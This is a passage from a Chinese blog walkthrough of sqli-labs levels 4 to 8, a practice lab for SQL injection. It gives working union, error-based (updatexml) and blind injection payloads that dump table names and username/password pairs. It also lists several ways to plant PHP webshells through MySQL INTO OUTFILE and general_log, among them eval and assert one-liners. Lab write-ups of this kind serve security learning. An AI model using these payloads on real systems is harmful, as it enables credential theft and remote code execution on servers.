4 时报错，内容和前三关一致，这里就一一列出</p>
<h4 id="判断回显字段"><a class="markdownIt-Anchor" href="#判断回显字段">#</a> 判断回显字段</h4>
<p>用联合注入 union select 1,2,3，然后 2,3 回显这里也不一一列出了</p>
<h4 id="获取数据库名称-2"><a class="markdownIt-Anchor" href="#获取数据库名称-2">#</a> 获取数据库名称</h4>
<p>在可回显的字段里换成 database ()<br>
union select 1,database(),3<br>
 也和前三关一样也就不一一列出了<br>
得到数据库名称为 database ()</p>
<h4 id="获取所有的数据"><a class="markdownIt-Anchor" href="#获取所有的数据">#</a> 获取所有的数据</h4>
<p>这里的操作和前三关都一样就不一一列出了</p>
<h2 id="sqli-labs-5"><a class="markdownIt-Anchor" href="#sqli-labs-5">#</a> sqli-labs-5</h2>
<h4 id="本关涉及内容"><a class="markdownIt-Anchor" href="#本关涉及内容">#</a> 本关涉及内容</h4>
<h5 id="updatexml"><a class="markdownIt-Anchor" href="#updatexml">#</a> updatexml()</h5>
<p>updatexml(xml_doument,XPath_string,new_value)<br>
 第一个参数：XML_document 是 String 格式，为 XML 文档对象的名称，文中为 Doc<br>
 第二个参数：XPath_string (Xpath 格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程。<br>
第三个参数：new_value，String 格式，替换查找到的符合条件的数据</p>
<p>updatexml(xml_doument,XPath_string,new_value)<br>
 第一个参数：XML 的内容<br>
第二个参数：是需要 update 的位置 XPATH 路径<br>
第三个参数：是更新后的内容<br>
所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合 XPATH 格式<br>
函数利用和语法明白了，下面注入的 payload 就清楚明白</p>
<p><strong>updatexml 最多只能显示 32 位，需要配合 SUBSTR 使用</strong></p>
<h5 id="concat"><a class="markdownIt-Anchor" href="#concat">#</a> concat()</h5>
<p>用于连接字符串</p>
<h5 id="substr"><a class="markdownIt-Anchor" href="#substr">#</a> substr()</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">substr(strings|express,m,[n])</span><br></pre></td></tr></table></figure>
<p>strings|express ：被截取的字符串或字符串表达式<br>
 m ：从第 m 个字符开始截取<br>
 n ：截取后字符串长度为 n</p>
<h5 id="select-distinct"><a class="markdownIt-Anchor" href="#select-distinct">#</a> select distinct()</h5>
<p>这个函数本关可以不用到，但是看到了就把他记下来<br>
用法如下：</p>
<blockquote>
<p>SELECT DISTINCT 表示查询结果中，去掉了重复的行</p>
</blockquote>
<p>百度的一个例子：<br>
如果要从 “Company” 列中选取所有的值，我们需要使用 SELECT 语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT Company FROM Orders</span><br></pre></td></tr></table></figure>
<p><strong>Orders</strong></p>
<table>
<thead>
<tr>
<th>Company</th>
<th>Num</th>
</tr>
</thead>
<tbody>
<tr>
<td>IBM</td>
<td>3532</td>
</tr>
<tr>
<td>W3School</td>
<td>2356</td>
</tr>
<tr>
<td>Apple</td>
<td>4698</td>
</tr>
<tr>
<td>W3School</td>
<td>6953</td>
</tr>
</tbody>
</table>
<p><strong>结果</strong></p>
<table>
<thead>
<tr>
<th>Company</th>
</tr>
</thead>
<tbody>
<tr>
<td>IBM</td>
</tr>
<tr>
<td>W3School</td>
</tr>
<tr>
<td>Apple</td>
</tr>
<tr>
<td>W3School</td>
</tr>
<tr>
<td>请注意，在结果集中，W3School 被列出了两次。</td>
</tr>
<tr>
<td>如需从 Company&quot; 列中仅选取唯一不同的值，我们需要使用 SELECT DISTINCT 语句：</td>
</tr>
</tbody>
</table>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT DISTINCT Company FROM Orders</span><br></pre></td></tr></table></figure>
<p><strong>结果</strong></p>
<table>
<thead>
<tr>
<th>Company</th>
</tr>
</thead>
<tbody>
<tr>
<td>IBM</td>
</tr>
<tr>
<td>W3School</td>
</tr>
<tr>
<td>Apple</td>
</tr>
</tbody>
</table>
<p>在结果集中，“W3School” 仅被列出了一次。</p>
<h4 id="初步判断-4"><a class="markdownIt-Anchor" href="#初步判断-4">#</a> 初步判断</h4>
<p>输入正确的 id</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>You are in…</p>
</blockquote>
<p>说明本关不回显<br>
添加’后，发现页面还是会报错的</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1</p>
</blockquote>
<p>可以看出本关还是单引号闭合</p>
<h4 id="获取数据库名称-3"><a class="markdownIt-Anchor" href="#获取数据库名称-3">#</a> 获取数据库名称</h4>
<p>这里用到报错注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+</span><br></pre></td></tr></table></figure>
<p>此时页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>security</sub>’</p>
</blockquote>
<p>得到数据库名称为<strong> security</strong></p>
<h4 id="获取所有表名-2"><a class="markdownIt-Anchor" href="#获取所有表名-2">#</a> 获取所有表名</h4>
<p>这里用到 updatexml ()</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema = &#x27;security&#x27;),1,31),0x7e),1) --+</span><br></pre></td></tr></table></figure>
<p>因为 updatexml () 函数只能显示 32 位，防止一次性爆出所有表名太长了这里使用 substr () 限制输出的位数<br>
页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>emails,referers,uagents,users</sub>’</p>
</blockquote>
<p>得到所有的表名为<strong> emails,referers,uagents,users</strong></p>
<h4 id="获取users所有列名"><a class="markdownIt-Anchor" href="#获取users所有列名">#</a> 获取 users 所有列名</h4>
<p>这里采用 limit 0,1 限制一次性爆出列名的数量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = &#x27;users&#x27; and table_schema=&#x27;security&#x27; limit 0,1),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>id</sub>’</p>
</blockquote>
<p>按顺序增加<br>
 limit 1,1<br>
limit 2,1<br>
…<br>
 直到页面异常<br>
可以得出所有的列名为<strong> id,username,password</strong></p>
<p>这里再尝试一下 group_concat 看看能不能一次性爆出所有的列名，看网上的教程说报错注入不能使用 group_concat 一次性获取所有的列名，尝试一下会出现什么情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27; and table_schema=&#x27;security&#x27;),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>id,username,password</sub>’</p>
</blockquote>
<p>得出还是能正常使用并得出所有列名的，我猜测应该是 updatexml () 只能显示 32 位，刚好这些列名没有超出 32 位就没有什么问题了<br>
这里有使用 updatexml () 和 group_conat () 来获取 users 表里的所有 username 来验证一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and updatexml(1,concat(0x7e,(select concat(0x7e,(select group_concat(username)),0x7e) from users),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘~~Dumb,Angelina,Dummy,secure,stu’</p>
</blockquote>
<p>很明显可以看出 username 没有完全爆出，这里数了一下’‘里的内容确实只有 32 位<br>
证明我的想法可能是对的’<doge>’<br>
好了，回归正题</doge></p>
<h4 id="获取所有username和password"><a class="markdownIt-Anchor" href="#获取所有username和password">#</a> 获取所有 username 和 password</h4>
<p>既然上面验证了 updatexml 和 group_concat 同时使用可能会发生的事情，这里就不会 “误入歧途” 了<br>
直接用 limit 依次获取所有的 username 和 password</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and updatexml(1,concat(0x7e,(select (select concat(username,0x7e,password)) from users limit 0,1),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>Dumb</sub>Dumb~’</p>
</blockquote>
<p>得出第一组 username 和 password 为 Dumb 和 Dumb<br>
 下面就不一一列出了就是 limit 1,1、limit 2,1 按顺序加上去就好了</p>
<h4 id="写入webshell-2"><a class="markdownIt-Anchor" href="#写入webshell-2">#</a> 写入 webshell</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; into outfile &#x27;C:/less5.php&#x27; lines terminated by 0x3c3f7068702061737365727428245f504f53545b6c657373355d293b3f3e --+</span><br></pre></td></tr></table></figure>
<p>这里的这串 16 进制 0x3c3f7068702061737365727428245f504f53545b6c657373355d293b3f3e 通过 16 进制转字符串可翻译为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php assert($_POST[less5]);?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="写入webshell归纳"><a class="markdownIt-Anchor" href="#写入webshell归纳">#</a> 写入 webshell 归纳</h4>
<h5 id="1-union-select写入"><a class="markdownIt-Anchor" href="#1-union-select写入">#</a> 1、union select 写入</h5>
<p>这是最常见的写入方式，union 跟 select into outfile，将一句话写入 shell.php，仅适用于<strong>联合注入</strong><br>
条件：secure_file_priv 支持 web 目录文件导出，数据库 File 权限，获取物理路径<br>
命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; union select 1,&quot;&lt;?php @eval($_GET[&#x27;cmd&#x27;])?&gt;&quot; into outfile &#x27;E:\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\cmd.php&#x27; --+</span><br></pre></td></tr></table></figure>
<h5 id="lines-terminated-by写入"><a class="markdownIt-Anchor" href="#lines-terminated-by写入">#</a> Lines terminated by 写入</h5>
<p>当 mysql 注入点为<strong>盲注或报错</strong>，Union select 写入是不能利用的，那么可以通过分隔符写入，SQLMAP 的–os-shell 命令，所采用的就是这种方式<br>
条件：secure_file_priv 支持 web 目录文件导出，数据库 File 权限，获取物理路径<br>
命令:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; into outfile &#x27;E:\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\321.php&#x27; lines terminated by &#x27;&lt;?php phpinfo(); ?&gt;&#x27;--+</span><br></pre></td></tr></table></figure>
<p>注入原理：通过 select 语句查询的内容写入文件，也就是 1’ into outfile 'E:\phpStudy\PHPTutorial\WWW\DVWA-master\aaa.php’这样写的原因，然后利用 lines terminated by 语句进行拼接，拼接后面的 webshell 内容</p>
<h5 id="3-lines-starting-by写入"><a class="markdownIt-Anchor" href="#3-lines-starting-by写入">#</a> 3、lines starting by 写入</h5>
<p>命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; into outfile &#x27;E:\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\123.php&#x27; lines starting by &#x27;&lt;?php phpinfo() ?&gt;&#x27;--+</span><br></pre></td></tr></table></figure>
<p>注入原理：利用 lines starting by 语句进行拼接，拼接后面的 webshell 内容，lines starting by 可以理解成以每行开始的位置添加 xx 语句</p>
<h5 id="4-fields-terminated-by写入"><a class="markdownIt-Anchor" href="#4-fields-terminated-by写入">#</a> 4、fields terminated by 写入</h5>
<p>命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; into outfile &#x27;E:\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\kuku.php&#x27; fields terminated by &#x27;&lt;?php phpinfo() ?&gt;&#x27;--+</span><br></pre></td></tr></table></figure>
<p>注入原理：利用 fields terminated by 语句进行拼接，拼接后面的 webshell 内容，fields terminated by 可以理解为以每个字段的位置添加 xx 内容</p>
<h5 id="5-columns-terminated-by写入"><a class="markdownIt-Anchor" href="#5-columns-terminated-by写入">#</a> 5、COLUMNS terminated by 写入</h5>
<p>命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; into outfile &#x27;E:\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\hao.php&#x27; COLUMNS terminated by &#x27;&lt;?php phpinfo() ?&gt;&#x27;--</span><br></pre></td></tr></table></figure>
<p>注入原理：利用 COLUMNS terminated by 语句进行拼接，拼接后面的 webshell 内容，COLUMNS terminated by 可以理解为以每个字段的位置添加 xx 内容</p>
<h5 id="6-利用log写入"><a class="markdownIt-Anchor" href="#6-利用log写入">#</a> 6、利用 log 写入</h5>
<p>新版本的 MYSQL 设置了导出文件的路径，很难在获取 webshell 过程中去修改配置的文件，无法通过使用 select into outfile 来写入一句话，这时我们可以通过修改 MYSQL 的 log 文件来获取 Webshell<br>
 条件：数据库用户需具备 Super 和 File 服务器的权限，获取物理路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;%general%&#x27;;                        #查看配置</span><br><span class="line">set global general_log = on;                            #开启general log模式</span><br><span class="line"> set global general_log_file = &#x27;E:/phpStudy/PHPTutorial/WWW/DVWA-master/evil.php&#x27;;    #设置日志目录为shell地址</span><br><span class="line">select &#x27;&lt;?php phpinfo() ?&gt;&#x27;                     #写入shell</span><br><span class="line">set global general_log=off;                             #关闭general log模式</span><br></pre></td></tr></table></figure>
<p>写入 webshell 学习于：<a target="_blank" rel="noopener" href="https://blog.csdn.net/bring_coco/article/details/114756692">https://blog.csdn.net/bring_coco/article/details/114756692</a></p>
<h2 id="sqli-labs-6"><a class="markdownIt-Anchor" href="#sqli-labs-6">#</a> sqli-labs-6</h2>
<h4 id="初步判断-5"><a class="markdownIt-Anchor" href="#初步判断-5">#</a> 初步判断</h4>
<p>输入正确的 id</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You are in…</p>
</blockquote>
<p>说明本关不回显<br>
添加’,&quot;后发现&quot; 输入后页面显示报错</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1&quot;” LIMIT 0,1’ at line 1</p>
</blockquote>
<p>说明需要闭合的是双引号</p>
<h4 id="获取数据库名称-4"><a class="markdownIt-Anchor" href="#获取数据库名称-4">#</a> 获取数据库名称</h4>
<p>使用报错注入得到数据库名称</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot; and updatexml(1,concat(0x7e,(select database()),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>security</sub>’</p>
</blockquote>
<p>从而得知数据库名称为<strong> security</strong></p>
<h4 id="获取所有表名-3"><a class="markdownIt-Anchor" href="#获取所有表名-3">#</a> 获取所有表名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot; and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema = &#x27;security&#x27;),1,31),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>emails,referers,uagents,users</sub>’</p>
</blockquote>
<p>得到所有的表名为<strong> emails,referers,uagents,users</strong></p>
<h4 id="获取users表中的所有列名"><a class="markdownIt-Anchor" href="#获取users表中的所有列名">#</a> 获取 users 表中的所有列名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot; and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27; and table_schema = &#x27;security&#x27;),1,31),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>id,username,password</sub>’</p>
</blockquote>
<p>得到 users 表中的所有列名为<strong> id,username,password</strong></p>
<h4 id="获取users表中的所有username和password"><a class="markdownIt-Anchor" href="#获取users表中的所有username和password">#</a> 获取 users 表中的所有 username 和 password</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot; and updatexml(1,concat(0x7e,(select (concat(username,&#x27;^&#x27;,password)) from users limit 0,1),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>XPATH syntax error: ‘<sub>Dumb^Dumb</sub>’</p>
</blockquote>
<p>改变 limit 后面的数字 limit 1,1、limit 2,1 。。。<br>
获取所有的 username 和 password</p>
<h4 id="写入webshell-3"><a class="markdownIt-Anchor" href="#写入webshell-3">#</a> 写入 webshell</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&quot; into outfile &#x27;C:/less6.php&#x27; lines terminated by 0x3c3f7068702061737365727428245f504f53545b4c657373365d293b203f3e --+</span><br></pre></td></tr></table></figure>
<p>可以在相关路径找到对应 php 文件，0x 开头的十六进制符号可以用 16 进制转字符翻译</p>
<h2 id="sqli-labs-7"><a class="markdownIt-Anchor" href="#sqli-labs-7">#</a> sqli-labs-7</h2>
<h4 id="初步判断-6"><a class="markdownIt-Anchor" href="#初步判断-6">#</a> 初步判断</h4>
<p>输入正确的 id</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You are in… Use outfile…</p>
</blockquote>
<p>加入’<br>
页面显示：</p>
<blockquote>
<p>You have an error in your SQL syntaxYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’)) LIMIT 0,1’ at line 1</p>
</blockquote>
<p>说明是 ((’’)) 闭合</p>
<h4 id="获取数据库名称-5"><a class="markdownIt-Anchor" href="#获取数据库名称-5">#</a> 获取数据库名称</h4>
<p>运用报错注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;)) and updatexml(1,concat(0x7e,(select database()),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You have an error in your SQL syntaxXPATH syntax error: ‘<sub>security</sub>’</p>
</blockquote>
<p>得到数据库名称为 security</p>
<h4 id="获取所有表名-4"><a class="markdownIt-Anchor" href="#获取所有表名-4">#</a> 获取所有表名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;)) and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema = &#x27;security&#x27;),1,31),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You have an error in your SQL syntaxXPATH syntax error: ‘<sub>emails,referers,uagents,users</sub>’</p>
</blockquote>
<p>得到所有的表名为<strong> emails,referers,uagents,users</strong></p>
<h4 id="获取users表中的所有列名-2"><a class="markdownIt-Anchor" href="#获取users表中的所有列名-2">#</a> 获取 users 表中的所有列名</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;)) and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name = &#x27;users&#x27; and table_schema = &#x27;security&#x27;),1,31),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You have an error in your SQL syntaxXPATH syntax error: ‘<sub>id,username,password</sub>’</p>
</blockquote>
<p>可以知道 users 表中所有的列名为<strong> id,username,password</strong></p>
<h4 id="获取users表中的所有username和password-2"><a class="markdownIt-Anchor" href="#获取users表中的所有username和password-2">#</a> 获取 users 表中的所有 username 和 password</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;)) and updatexml(1,concat(0x7e,(select concat(username,&#x27;^&#x27;,password) from users limit 0,1),0x7e),3) --+</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You have an error in your SQL syntaxXPATH syntax error: ‘<sub>Dumb^Dumb</sub>’</p>
</blockquote>
<p>得到第一组 username 和 password 为 Dumb^Dumb<br>
 接着更改 limit 后面的数字获取所有的 username 和 password</p>
<h4 id="写入webshell-4"><a class="markdownIt-Anchor" href="#写入webshell-4">#</a> 写入 webshell</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27;)) into outfile &#x27;C:/Less7.php&#x27; lines terminated by 0x3c3f7068702061737365727428245f504f53545b4c657373375d293b203f3e --+</span><br></pre></td></tr></table></figure>
<h2 id="sqli-labs-8"><a class="markdownIt-Anchor" href="#sqli-labs-8">#</a> sqli-labs-8</h2>
<h4 id="初步判断-7"><a class="markdownIt-Anchor" href="#初步判断-7">#</a> 初步判断</h4>
<p>输入正确的 id</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1</span><br></pre></td></tr></table></figure>
<p>页面显示：</p>
<blockquote>
<p>You are in…</p>
</blockquote>
<p>说明本题不回显<br>
加上’<br>
页面显示异常，本题报错不回显<br>
输入–+<br>
 页面显示正常<br>
说明有包装</p>
<p>本题需要我们使用盲注来获取信息</p>
<h4 id="获取数据库名称-6"><a class="markdownIt-Anchor" href="#获取数据库名称-6">#</a> 获取数据库名称</h4>
<p>先判断数据库名称的长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and (length(database()))=1 --+</span><br></pre></td></tr></table></figure>
<p>从 1 一直到 8 时<br>
此时页面显示 you are in…<br>
 说明数据库名称长度为 8</p>
<p>用 left 获取数据库名称从左到右的字符这里（也可以使用 ascii 等）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and left((select database()),1)=&#x27;s&#x27; --+</span><br></pre></td></tr></table></figure>
<p>依次增加数字和尝试后面的字符，可以配合 &gt;,&lt;,=, 二分法一起使用<br>
如 url?id=1’ and left ((select database ()),1)&gt;‘a’ --+<br>
 最终可以得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url?id=1&#x27; and left((select database()),8)=&#x27;security&#x27;</span><br></pre></td></tr></table></figure>
<p>即数据库名称等于 security</p>
<h4 id="获取所有信息"><a class="markdownIt-Anchor" href="#获取所有信息">#</a> 获取所有信息</h4>
<p>除此之外我们还可以获得所有数据库的名称，使用同样的方法去一个一个才出来，也可以使用 sqlmap 直接跑，获取所有的内容<br>
如果手工注入可能花费的时间比较久<br>
 payload 如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//获取所有数据库名称</span><br><span class="line">url?id=1&#x27; and left((select schema_name from information_schema.schemata limit 0,1),5)=&#x27;mysql&#x27; --+ //查出来本地的第一个数据库为mysql</span><br><span class="line">//获取security数据库下的所有表名</span><br><span class="line">?id=1&#x27; and left((select table_name from information_schema.tables where table_schema=&#x27;security&#x27; limit 0,1),1)&gt;&#x27;a&#x27; --+</span><br><span class="line">//获取security数据库users表下的所有列名</span><br><span class="line">?id=1&#x27; and left((select column_name from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=&#x27;security&#x27; limit 0,1),1)&gt;&#x27;a&#x27; --+</span><br><span class="line">//获取所有username和password</span><br><span class="line">?id=1&#x27; and left((select username from users limit 0,1),1)&gt;&#x27;a&#x27; --+</span><br></pre></td></tr></table></figure>

<div class="article-footer fs14">
    <section id="license">
      <div class="header"><span>许可协议</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名 - 非商业性使用 - 相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    </div>
</article>
<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">较新文章</div><a href="/2022/12/22/php%E5%AD%A6%E4%B9%A02022-12-22/">php学习2022-12-22</a></div><div class="item" id="next"><div class="note">较早文章</div><a href="/2022/12/21/php%E5%AD%A6%E4%B9%A02022-12-21/">php学习2022-12-21</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Dr4x3zz</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1">Stellar 1.29.1</a> 主题创建。<br>
本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">本文目录</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-labs-1-8"><span class="toc-text"> sqli-labs-1-8</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="toc-text"> SQL 注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8"><span class="toc-text"> SQL 注入常用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%93%AA%E9%87%8C%E5%AD%98%E5%9C%A8sql%E6%B3%A8%E5%85%A5"><span class="toc-text"> 哪里存在 SQL 注入？</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-text"> sql 注入的类型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#mysql%E4%B8%AD3%E7%A7%8D%E6%B3%A8%E9%87%8A%E9%A3%8E%E6%A0%BC"><span class="toc-text"> MySQL 中 3 种注释风格</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="toc-text"> 判断注入点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4"><span class="toc-text"> 步骤</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E5%88%A4%E6%96%AD%E5%88%97%E6%95%B0"><span class="toc-text"> 1、判断列数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E5%88%A4%E6%96%AD%E6%98%BE%E7%A4%BA%E4%BD%8D"><span class="toc-text"> 2、判断显示位</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-%E8%8E%B7%E5%8F%96%E5%BD%93%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E7%A7%B0%E5%92%8C%E5%BD%93%E5%89%8D%E8%BF%9E%E6%8E%A5%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E7%94%A8%E6%88%B7"><span class="toc-text"> 3、获取当数据库名称和当前连接数据库的用户</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" 